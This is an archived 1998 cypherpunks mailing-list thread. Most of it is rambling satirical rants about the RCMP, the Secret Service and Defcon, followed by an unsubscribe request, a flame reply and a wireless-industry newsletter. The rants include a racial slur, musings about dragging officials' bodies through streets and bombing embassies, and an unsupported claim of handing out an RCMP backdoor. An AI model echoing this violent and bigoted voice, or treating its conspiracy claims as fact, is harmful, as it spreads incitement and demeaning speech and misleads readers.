of UltimateEnlightenment, although in a TimeSpaceContinuum inhabited by

Lenny Bruce, Andrew Dice Clay, Howard Stern and Johnny Wadd.



  For all of my CynicalBitching&Whining about the ReptilianNaziSchills

who have made it their life's work to BungHole the Citizenry at every

opportunity, my TruthVisionUltimateCosmicOrgasm was, in effect, the end

result of an endless parade of ReptilianNaziSchills who have crossed my

path in life, who were TrueBelievers in TheVoice which ensured them that, 

"If you ButtFuck them, they will Cum."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Thu, 13 Aug 1998 08:13:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Deaf Cons 5.9.1
Message-ID: <TCPSMTP.18.8.13.9.28.14.2847582152.1143269@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain


                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Thu, 13 Aug 1998 08:14:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Deaf Cons 5.9.2
Message-ID: <TCPSMTP.18.8.13.9.28.46.2847582152.1143270@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain

                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 



Deaf Cons 5.9.2 - SPACE ALIENS HIDE MY DRUGS!!!

_______________________________________________



  My SpurOfTheMomentDecision to join Forces (pardon the pun) with the

RCMP in their attempts to villify me was partly the result of an interesting

revelation by the Secret Service during their interview with me, partly

a result of a rather disturbing discovery shortly after my construction

and dissemination of a variety of VirtualNuclearDevices in Southern

Saskatchewan, and a number of other interesting anomolies which led to

WetDream Crescendo during my Deaf Cons 5.9 Jimi Hendrix Experience.



  I had constructed a variety of VirtualNuclearDevices which utilized

such rEvolutionary VirtualConcepts as MasonJars full of water, containing

Metallica tapes/albums, representing HeavyWater, Dildos and Chocolate

Donuts, which served as the PlutoUraniumCynicalAss, soon to become,

by virtue of SyphlitticDecay, a CriticalMass given by excommunicated

GayCatholicPriests who were BadMouthing the Pope, without swallowing.

(As well as a plethora of other Half-Life/Half-Meaningful Cymbals of

AtomicSavagery intended as a SlightlyOverTheHeadOfMentalMidgets HINT!!!

to the RCMP that They (TM) could FuckAllOfTheSheepleSomeOfTheTime, and

FuckSomeOfTheSheepleAllOfTheTime, but, as the Tim C. May Vernacular

Translation of the Bible plainly states, "Truth (TCM) is a TwoEdgedDick,"

and "It is easier for a needle to pass through the scarred veins of

a Junkie, than for a member of a ThreeLetterSecretGovernmentAgency to

pass enough water on themselves to keep from BurningInHell."





Fitting A Round PsychoKiller Into A Square MadBomber Profile:

"Being framed is the sincerest form of flattery."

~Lee Harvey Oswald



  Less than a mile south of the Canadian Border, as I was going through the leather computer bag which had contained the Virtual Nuclear Devices I had

recently dropped off, I found a live ShotGunShell in a container much

like those I had used to construct parts of the devices. I immediately

flashed back to the face of the 'retired' US Air Force Intelligence Agent

who had passed by my house in Bienfait that morning, as I was leaving,

and who seemed unable to look his OldDrinkingBuddy in the eye, instead

casting a GuiltyGaze toward the ground and walking just a little bit

faster...

  When the Secret Service dropped a reference to 'gasoline' being a

part of the make-up of 'bombs' being attributed to me in the Great

White Snort, and articles began showing up in the Tucson NewsRags

about mysterious 'gasoline bombs' being discovered in Tucson, I got

the uneasy feeling that the identity of the UnknownIndividual involved

had been decided well in advance of the 'discovery' of the devices.

  After the Secret Service had gone through my truck, with my full

permission, undoubtedly observing the McDonald Observatory pamphlet

that I had picked up on my last TruthMonger SoftTarget Tour Of Ameridca,

an article in the Tuscon NewsRags a few day later pointed out that a

ten-million dollar telescope/mirror was being moved to a more secure

location in order to prevent sabotage. Once again, I could distinctly

smell Villification in the air.



  Everywhere I go lately, from Tucson to Vegas, Nogales to Bullhead City,

I seem to be encountering both Metal&PlasticBadge LEAs who threaten me

with documented instances of my guilt from the Proverbial DogAtLarge

CrimesAgainstHumanity, to a plethora of other Illegal/Villainous crimes

such as Animal Abuse, Bomb Threats, Death Threats, Suspicion Of Intent

To Have A Bad Attitude, EtAl, AdInfinituum--all without ever seeming to

actually have anything to charge me with, per se. 

  Can you say 'Villification'...sure, you can...



  In 1969, after being charged with possession of a single joint, in

Yorkton, Saskatchewan, I found myself, after having driven for years

without receiving any tickets for traffic infractions, hauled up in

front of the judge who would be deciding my fate on the drug charge,

as the result of a dozen or so minor traffic offenses.

  By the time I went to court on the drug charge, I might as well have

been wearing a prison uniform and holding a MugShotNumberCard under my

chin, since I was more of a standard court fixture than much of the

furniture in the courtroom.

  The more the JackBoot in your back changes, the more it remains the

same...





  While working on the US Customs computer system during the late a970's,

I pulled up my computer profile, with the customs officer watching me

unaware that it was my file, since he knew me only as C.J. Parker.

  When I pointed to a particular notation in the file and asked what

it meant, he laughed and said it was a ThinlyVeiledNotice to those

reading it that, "If you get a chance to Fuck this guy, Fuck him *good*."

  Comforting...



  Things in American Law Enforcement and the American Justice System are

reaching the point where it would be a DogSend to merely have "a few

good men doing nothing," so that Evil would Prevail at a less rapid pace

than it is currently doing.

  The multitude of BadMen doing Evil, yet portraying themselves as the

DefendersOfFreedomAndJustice, has reached proportions where the Citizenry,

were they not so Numbed&Stupified by the DailyTorrents of DoubleSpeak,

DoubleStandards and DoubleDealing by RecognizedAuthority, would rise

up against the ArmedOppressors with such violence as to make the

Somalian people defending their homes and neighborhood against the

ArmedInvaders of the GreatestOppressiveDemocracyInTheWorld look like

schoolchildren playing games.



  Maybe we need to drag the bodies of AmerikanOppressors through

American streets. Maybe we need to bomb our own embassies, at home.

  Maybe we need to defend ourselves against our HomeGrown Oppressors

every bit as Valiently as those in Foreign Lands who must find it

incredulous that our GreatLeaders can express such surprise that

UnGrateful Foreign Wretches shoot back at our troops and bomb our

embassies when we engage in ArmedInvasions of their HomeLands in 

order to impress upon them that, "We're from a Democratic Government

and we're here to *help* you--EVEN IF IT MEANS KILLING EVERY LAST

ONE OF YOU IGNORANT, FOREIGN SAVAGES!!!"










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Thu, 13 Aug 1998 08:15:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Deaf Cons 5.9.1
Message-ID: <TCPSMTP.18.8.13.9.29.16.2847582152.1143271@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain

                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 

Deaf Cons 5.9.1 - SPACE ALIENS HIDE MY DRUGS!!!

_________________________________________________________



[EditWhore's Left Note: The Author, once again finding HimOrHerSelf

 hounded by the Hounds of Hell from anything remotely resembling a

 functional computer system, is once again composing HerOrHis SPAMOLOGIES 

on a Sperry Type 3070-02 computer with 128K of RAM, which seems to be

capable of adequately storing only about a page and a half of text at

any given point in time, even using a rudimentary editor such as edlin.

The Reader need not fear, however, that this small setback will keep the

Author from generating HisOrHer UsualQuantity of USDA DisApproved SPAM

and flinging it in the general direction of the CypherPunks Disturbed

Male LISP, although this, what may indeed be the final chapter of SAHMD,

will undoubtedly be sent to the list in thinly-sliced servings, suitable

for serving as SnackFood at CypherPunks Physical Meetings, labeled as

TruthMonger Caviar.]



[Arthur's Right Nut: After having had tens of thousands of dollars worth

of computer hardware and software stolen from me by various LEAs, as a

result of being so uncouth as to refer to the Government Penis (TM) being

inserted into the BungHoles of the Citizenry a 'BIG HAIRY DICK,' I found

it rather amusing to have an attendee of Deaf Cons 6.0 (for *some* of

the people, who made it to the end of the conference) inform me that he

had been following 'The True Story Of The InterNet' manuscripts, and

was disappointed in the "erratic quality of the finished product."

I replied, with as straight a face as possible, that I, myself, had

recently received a SnailMail correspondence from Kevin Mittnick, but

had thrown it in the garbage without reading it, since I found the quality

of the prison stationary it was written on to be substandard.

As well, since it appeared that the BumsRush/NoseFirstIntoThePavement

that I received from Plaza Hotel Security was the result of being

RattedOut for some ImaginedCrime (TM) by a Deaf Cons 6.0 staff member

who somehow felt that I, as a CommonCitizen, was not entitled to provide

the same type of falsified evidence against myself as the RCMP are

currently manufacturing. I was tempted, upon making my exit to suggest

to the staff member that Kevin Mittnick (a Deaf Cons DemiGod) would be

making an appearance later, and should also be RattedOut, in the interest

of preventing the attendees from being cast in a bad light by their

association with him.]





Bottom Line:

"It's a Predatorial Universe..."



  My journey to Deaf Cons 6.0 was actually for the purpose of having a

chat with <erewhon@dis.org>, in regard to the interest that the Secret

Service seemed to show in my <hee-hee> personal <ha-ha> email correspondence

with him over the InterNet.



  I had actually *gambled* my way to Lost Wages, having had a dream about

Castles and such, then going to the DoubleDiamondCasino in Tucson, and

turning $20.00 into $100.00, on a quarter slot-mnachine with knights and

castles, etc., in order to get travelling money.

  Once at Deaf Cons 6.0, I found out that the individual I was seeking

had short-cropped hair, with an Atom tattoo'd (?) on the back of hisskull.

One of the DoorMen/Staff was kind enough to provide me with an Pass,

in order to help me locate AtomHead. (My lack of success in doing so

might will have been due to my inability to refrain from exercising

my sick sense of humor, informing people, "Tell him that I have a

warrant for him.")



  Having had all of my offers to provide anyone interested with a password

into the Royal Canadian Mounted Police computer system rebuffed, even

having gone so far as to offer disks containing an RCMP BackDoor as prizes

at the conference, I decided to change my plans and just give away the

SonsOfBitches at random, accompanied with the advice that, since the

floppies had my fingerprints all over them, and they contained LjEA

WaterMarks identifying them as disks created on my personal computer

system, they would make ideal 'Evidence' to be left behind at the

scene of "bizarre and meaningless crimes," such as bombing the rubble

the former Murrah Federal Building in OKC.

  My parting words to the BlessedRecipients of my QuestionableGifts was,

"Since the RCMP's attempts to set me up are RatherLame (TM), I figure

that I ought to do what I can to help them out, since, anything they can

do, I can do better."



[Note From The Author:Besides using the conference as an opportunity to

engage in my continuing, tireless efforts at SelfDegradation, I also

took the time to help out one of our fellow CypherPunks, Lucky Green,

who was a featured speaker at Deaf Cons 6.0.

 Realizing that none of the attendees were likely to show much interest

in such a boring and arcane subject as SmartCards, I told everyone I

encountered that Lucky's lecture had been canceled, and that, in its

place, I would be giving a lecture entitled, "How I Broke PGP," although

I stressed that I would not be providing any specific details, because

if I shared the secrets I learned in my Grade 4 math class with just

GodAndEverybody, then EncryptionAsWeKnowIt would suffer a devastating

blow from which it might never recover.

 Although I was given the BumsRush out of the building just as Lucky was

taking the stage, I am certain that he probably weathered the catcalls

and hurled objects quite well, eventually winning over the angry mob that

had gathered.]










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Thu, 13 Aug 1998 08:15:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Deaf Cons 5.9.3
Message-ID: <TCPSMTP.18.8.13.9.29.42.2847582152.1143272@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain

                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 

Deaf Cons 5.9.3 - SPACE ALIENS HIDE MY DRUGS!!!

_______________________________________________



Rob Brezsny''s Horoscopes / Week of August 6-12:

Taurus (APRIL 20-MAY 20):Some Jews regard their

houses as a more sacred place of worship than the

synagogue. Many pagans feel no need to confine their

celebrations to any special building, but offer their prayers

to the earth and sky. Several Zen Buddhists I've known

have claimed they're as likely to find enlightenment while

microwaving a burrito under the flourescent lights of a

convenience store as when meditating on a straw mat in a

monastery. In the spirit of these seekers, Taurus, I exhort

you to look for divine inspiration in both the strangest and

most familiar places this week--anywhere other than where

it's "supposed" to be.





  Since I have been OfficiallyExhorted to seek divine inspiration

in "both the strangest and familiar places," I guess this is as good

a time as any to KILL two LarryBirds with one WindowPaneStone, and

seek DivineInspiration in a place that is both strange and familiar

to me--TheOtherSideOfMadness (TM).



  Since my efforts to SaveTheLifeOfAMillionSingleInnocentChildren,

by going to great lengths to research and deal with my various

physical/mental/emotional infirmities to the best of my ability,

have been constantly thwarted by a variety of Officially Recognized

Authorities who have taken it upon themselves to steal and/or deny

me access to the tools and techniques that I use to minimize the

effects of my dsyfuntions and disabilities, I think it is time to

submit to the wishes of the Controllers and cease all efforts to

attempt to exercise control over my dysfunctionality in a manner

that has proven successful, for the most part, to date.



  Accordingly, I hereby serve notice that "I Quit!"





  Since the Contollers seem to find it unacceptable for me to

release the tension that builds in my psyche by screaming the

Truth (TM) about the Villainous Nature of Mounties trained in

the use of ArmedViolence casually slaughtering a FirstNations

mother and the young child clinging to her skirt, for no apparent

reason other than a lack of incentive to resolve a conflict peacefully,

given the fact that whacking out a WagonBurnerBitch and her Future

Young GlueSniffer will inevitably be found justifiable by his RCMP

BumBuddies during their investigation of his murder, then I will no

longer do so.

  Instead, I will just let the SenseOfInjustice ferment inside of me.



  Since Lost Wages LEA's deem it necessary for me to remove the chains

securing my baggage in the back of my truck, in order to chain my dog

'legally' outside of my truck (where it is five degrees hotter than

inside the truck, since I am willing to go without food to provide

her with enough blocks of ice to provide her with comfort and safety),

thus enabling their local junkies to go through my possessions and

steal all of my medications, then far be it from me to go against their

wishes for me to drift into unmedicated savagery rather than disobey 

the letter of laws written by Imbeciles who aren't half as smart as

my dog, Baby, who immediately jumped back into the truck through the

open window, dragging the chain with her, wondering why the fuck these

uniformed Idiots expected her to lay on hot concrete instead of a

nice, cool block of ice.

(I urge you, at your next local, state and federal elections, to

 vote for Baby as a WriteInCandidate. In her recent TV debate with

Buddy, the FirstDog, Baby told him, "I *knew* Lassie...and you're no

Lassie...")



  Since files pulled off of the RCMP and various other Canadian Government

computer systems indicate their desire to apply pressure to me while I

am in a state of under-medication they might find this an opportune

time to once again engage in their spurious activities (all the time

wearing KevlarJackets while keeping their fingers crossed that I will

vent my PsychoticWrath in the directions suggested by the Bienfait

Nutly News "KILL The Children!!!" Special, rather in their directionO.



  In effect, given the apparent unacceptability of my attempting to

control the effects of my disabilities with my own time-proven

tools and techiques, I will cease doing so, and allow the Controllers

to accept the responsibility of providing me with the medicatopms amd

tools needed to keep my dysfuntionality from becoming a problem to

Society.

  Given the recent massive amounts of concern expressed about disabled

individuals such as the gentleman who shot his way into the Hallowed

Halls of the US Legislature building in DC, one might think that my

future attempts to have the Controllers provide me with medication and

health care, in order to help me to prevent my disability from causing

unwanted consequences to the society that I live in, might be met

with joyful enthusiasm.



  Right...and I've got some OceanFrontPropertyInTucsonArizona that

has a 1500 mile sandy beach bordering on the Pacific Ocean...



  Congressmen...Smoke 'em if you got 'em...



[Final Note From The Author:If Defcon McCullagh Chainsaw was half the

ReportWhore he claims to be, he wouldn't have to ask me, "Why do you

send your missives to the CypherPunks list?"

The answer, "Because I am a CypherPunk." is the *short* answer.

What it implies, in essence, is that the CypherPunks Distributed

Mailing List is a DigitalGlobalCommunity which reflects what the

InterNet Communities of the Future *should* be.

GeoPhysicallyLocated MeatSpace Communities may reflect the convergence

of people with similar lifestyles and values, for the most part, but

they do not consist of BlackSmith communities in which only BlackSmiths

live, etc.

Just as a foundling country known as the United States of America was

built around the idea of Freedom&Democracy in which the Citizenry was

deemed to have the right to live according to a wide variety of lifestyles,

with diverse religious and secular beliefs, a CypherPunks list that

was founded in the interests of promoting Encryption, Privacy and

Freedom would be a stark landscape, indeed, if it were only occupied

by individuals with a narrow range of attitudes, mindsets, and perceptive

world-views.

Tim May commented in a post, at one point, that the list was poorer for

the current absence of some of the more statist nay-sayers to the more

common CypherPunks views and positions, particularly those who brought

a modicum of thought and reason to their posts to the list. I enjoyed

firing cynical, acidic salvos at Kent Crispin as much as anyone else on

the list did, but I regarded him as a valuable member of the CypherPunks

community--one who caused me, more than once, to recognize the value

of concepts and ideas that ran contrary to my normal way of viewing

life around me.

Dr. Dimitri Vulis, ShitDisturberExtraordinaire, provided one of the

most poignant moments in CypherPunks History by interpreting his forced

unsubscribing from the list as censorship, and routing around it. I hope

that John Gilmore, one of the premiere contributors to the existence

of the CypherPunks Legendary Lunacy Collective, eventually looked in 

the mirror one morning and said, "Boy, am I a SillyAss, or what?"

Even the list members who bore us with that mathematical crap, showing

off just because they can count to 21 without taking off their mittens

and their shoes, and pulling out their Dick, contribute to the list, by

making us look good in the eyes of those who mistakenly believe that

there are more important things in life than discussing Ebonics and

pissing all over each other and ourselves.

And where else can a WannaBeNuclearSuitcaseMadBomber ask a simple

question like, "Where do I connect the 'yellow' wire?" and get a

thirty-post thread discussing PlutoniumDecayRates.

Is it any wonder that Robert Hettinga *loves* this list?

In closing, let me remind you that:

"Lassie kills chickens!"

"Time flies like an arrow, fruit flies like a banana."

"He who shits on the road will meet flies upon his return."

~The Author]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Entropy <sysadmin@thegrid.net>
Date: Thu, 13 Aug 1998 10:29:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808131729.KAA05613@pop.thegrid.net>
MIME-Version: 1.0
Content-Type: text/plain


please take us off the mailing list.
thanks you
burke bryant
sysadmin@thegrid.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Entropy <sysadmin@thegrid.net>
Date: Thu, 13 Aug 1998 19:19:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808140219.TAA25827@pop.thegrid.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:37 PM 8/13/98 -0700, you wrote:
>
>> On 13 Aug 1998, HyperReal-Anon wrote:
>> 
>> > > our address that the mail is being sent to is: sysadmin@thegrid.net
The interesting fact here is that you all seem to have nothing better to do
with your time than converse over something so petty as an address error.....
I think you need to re-evaluate who the mental midgets are.....
I would hope the future of our world isn't in the hands of such petty
people such as yourselves...



> > > we appreciate your mail but the volume is slightly overwelming for us to
>> > > handle..
>> > > sincerely, burke bryant
>> > > 
>> > > 
>> > 
>> > Take yourself off, you mental midget.
>> 
>> Come now. Is there any reason to insult midgets by comparing them to
>> this guy? :)
>
>Quite right. Most vertically-challenged individuals are upstanding members
>of society and of at least average intelligence. They don't deserve to be
>compared to this guy. :) 
>
>I would call him a moron, but then I'd be insulting morons. 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 13 Aug 1998 11:08:03 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 13, 1998
Message-ID: <199808131755.MAA25234@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713794.multipart/mixed"

--Boundary..3995.1071713794.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/     for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713794.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "_CTIA_Daily_News_19980813.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8Q0VOVEVSPiZuYnNwOzwvQ0VOVEVS
PgoKPENFTlRFUj48VEFCTEUgQk9SREVSPTAgQ09MUz0yIFdJRFRIPSI2MDAi
ID4KPFRSPgo8VEQ+PEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbSI+
PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20vaW1hZ2VzL2hvbWVo
ZWRfdGVzdC5naWYiIEFMVD0iV09XLUNPTS5DT00iIE5PU0FWRSBCT1JERVI9
MCBIRUlHSFQ9ODkgV0lEVEg9Mjc1PjwvQT48L1REPgoKPFREPgo8Q0VOVEVS
PjxBIEhSRUY9Imh0dHA6Ly93d3cud2lyZWxlc3NpdC5jb20iPjxJTUcgU1JD
PSJodHRwOi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9hcnRkcm9wLzB3aXJl
bGVzc2l0LmdpZiIgQUxUPSJUb2RheSdzIE5ld3MgU3BvbnNvcmVkIGJ5IFdJ
UkVMRVNTIEkuVC4gOTgiIE5PU0FWRSBCT1JERVI9MCBIRUlHSFQ9NjAgV0lE
VEg9MjM0PjwvQT48L0NFTlRFUj4KPC9URD4KPC9UUj4KPC9UQUJMRT48L0NF
TlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8Q0VOVEVSPjxUQUJM
RSBCT1JERVI9MCBXSURUSD0iNjAwIiA+CjxUUiBCR0NPTE9SPSIjMDAwMDk5
Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0NDQyI+PEZPTlQgU0laRT0rMT5DVElB
CkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09NIC0gQXVndXN0IDEzLCAxOTk4PC9G
T05UPjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iNTgwIj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5UYXggTGlr
ZWx5IHRvIFJhaXNlIFBob25lCkJpbGxzIGluIERlbnZlcjwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgRGVudmVy
IFRyZWFzdXJlcidzIE9mZmljZSBzYXlzIHRoYXQKbmV4dCBtb250aCBpdCB3
aWxsIGltcG9zZSBhIHRheCBvbiBsb25nLWRpc3RhbmNlIGNvbXBhbmllcyBz
dWNoIGFzIEFUJmFtcDtUCkNvcnAuLCBNQ0kgQ29tbXVuaWNhdGlvbnMgQ29y
cC4gYW5kIG90aGVyIGNhcnJpZXJzIHRoYXQgc2VydmUgRGVudmVyIHJlc2lk
ZW50aWFsCmFuZCBidXNpbmVzcyBjdXN0b21lcnMuIFRoZSBtb250aGx5IHRh
eCwgd2hpY2ggd2lsbCBlcXVhbCAkMS4xMiBwZXIgRGVudmVyCmN1c3RvbWVy
LCBpcyBleHBlY3RlZCB0byBiZSBwYXNzZWQgb24gdG8gY29uc3VtZXJzIGFu
ZCBidXNpbmVzc2VzIGFzIGFuCml0ZW1pemVkIHN1cmNoYXJnZSBvbiBtb250
aGx5IGJpbGxzLiBQcm92aWRlcnMgb2Ygd2lyZWxlc3MgcGhvbmUgYW5kIHBh
Z2luZwpzZXJ2aWNlcyBpbiBEZW52ZXIgYWxzbyBtYXkgaGF2ZSB0byBwYXks
IGRlcGVuZGluZyBvbiBob3cgdGhlaXIgbmV0d29yawp0ZWNobm9sb2d5IG9w
ZXJhdGVzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5kZW52ZXJwb3N0LmNvbS9i
dXNpbmVzcy9iaXowODEyLmh0bSI+REVOVkVSClBPU1Q8L0E+KTwvRk9OVD48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlRl
bGVjb21tdW5pY2F0aW9ucyBSZXNlbGxlcnMKQXNzb2NpYXRpb24gUmVjb21t
ZW5kcyZuYnNwOzwvRk9OVD48L0ZPTlQ+PC9CPgo8QlI+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkZhc3RlciBXYXkg
dG8gQWNoaWV2ZQpXaXJlbGVzcyBOdW1iZXIgUG9ydGFiaWxpdHkmbmJzcDs8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
SW4gQXVndXN0IDEwIGNvbW1lbnRzIHRvIHRoZSBGQ0MsIHRoZQpSZXNlbGxl
cnMgQXNzb2NpYXRpb24gc2FpZCB0aGF0IGl0IGlzIHVubmVjZXNzYXJ5IGZv
ciBldmVyeSBjZWxsIHNpdGUgaW4KdGhlIFVuaXRlZCBTdGF0ZXMgdG8gYmUg
bW9kaWZpZWQgaW4gb3JkZXIgZm9yIHdpcmVsZXNzIG51bWJlciBwb3J0YWJp
bGl0eQp0byB3b3JrLiZuYnNwOyBUaGUgVFJBIHBsYW4gY2FsbHMgZm9yIHdp
cmVsZXNzIG51bWJlciBwb3J0YWJpbGl0eSB0byBiZQpwaGFzZWQtaW4gd2l0
aCBpbXBsZW1lbnRhdGlvbiBpbiBtYWpvciBtYXJrZXRzIGZpcnN0LCBhbmQg
d2l0aCBzZWNvbmRhcnkKYW5kIHJ1cmFsIG1hcmtldHMgYnJvdWdodCBvbmxp
bmUgbW9yZSBzbG93bHkgYnV0IHN0aWxsIHdpdGhpbiBhIHJlYXNvbmFibGUK
cGVyaW9kIG9mIHRpbWUuICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNv
bS9wcm5ld3MvOTgwODExL2RjX3RyYV9wb3JfMS5odG1sIj5ZQUhPTzwvQT4p
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9KzE+SXQncyBUb3VnaCB0byBGaW5kIFlvdXIKV2F5IGluIFdvcmxkIG9m
IFdpcmVsZXNzIFNlcnZpY2UsJm5ic3A7PC9GT05UPjwvRk9OVD48L0I+CjxC
Uj48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
KzE+V2FsbCBTdHJlZXQgSm91cm5hbCBDb2x1bW5pc3QKV3JpdGVzPC9GT05U
PjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNvbnN1
bWVycyBmYWNlIGEgYmV3aWxkZXJpbmcgYXJyYXkgb2YKdGVjaG5vbG9neSBj
aG9pY2VzLCBicmFuZCBuYW1lcyBhbmQgcHJpY2VzLiAiQWxsIHRoZSBoeXBl
IHN1cnJvdW5kaW5nIHdpcmVsZXNzCnBob25lcyBvYnNjdXJlcyBhIGZldyBo
YXJkIHRydXRoczogQ29uc3VtZXJzIHN0aWxsIGFyZSBwbGFndWVkIGJ5IHRv
byBtYW55CmNhbGxzIHRoYXQgZG9uJ3QgZ2V0IHRocm91Z2gsIGJ5IHBvb3Ig
c291bmQgcXVhbGl0eSBhbmQgYnkgY2FsbHMgdGhhdCBicmVhawp1cCBpbiBw
cm9ncmVzcy4gU3dpdGNoaW5nIHNlcnZpY2VzIG9mdGVuIGp1c3QgbWVhbnMg
c3dhcHBpbmcgb25lIHNldCBvZgpwcm9ibGVtcyBmb3IgYW5vdGhlciwiIHRo
ZSBjb2x1bW5pc3Qgd3JpdGVzLiAoPEEgSFJFRj0iaHR0cDovL2ludGVyYWN0
aXZlLndzai5jb20vZWRpdGlvbi9jdXJyZW50L2FydGljbGVzL1NCOTAyOTU1
NDU5NzUyODQ5NTAwLmh0bSI+V0FMTApTVC4gSk9VUk5BTDwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
UGhvbmUgV2FycyBMZWF2ZSBGQ0MKaW4gYSBQb2xpdGljYWwgQ29tYmF0IFpv
bmU8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
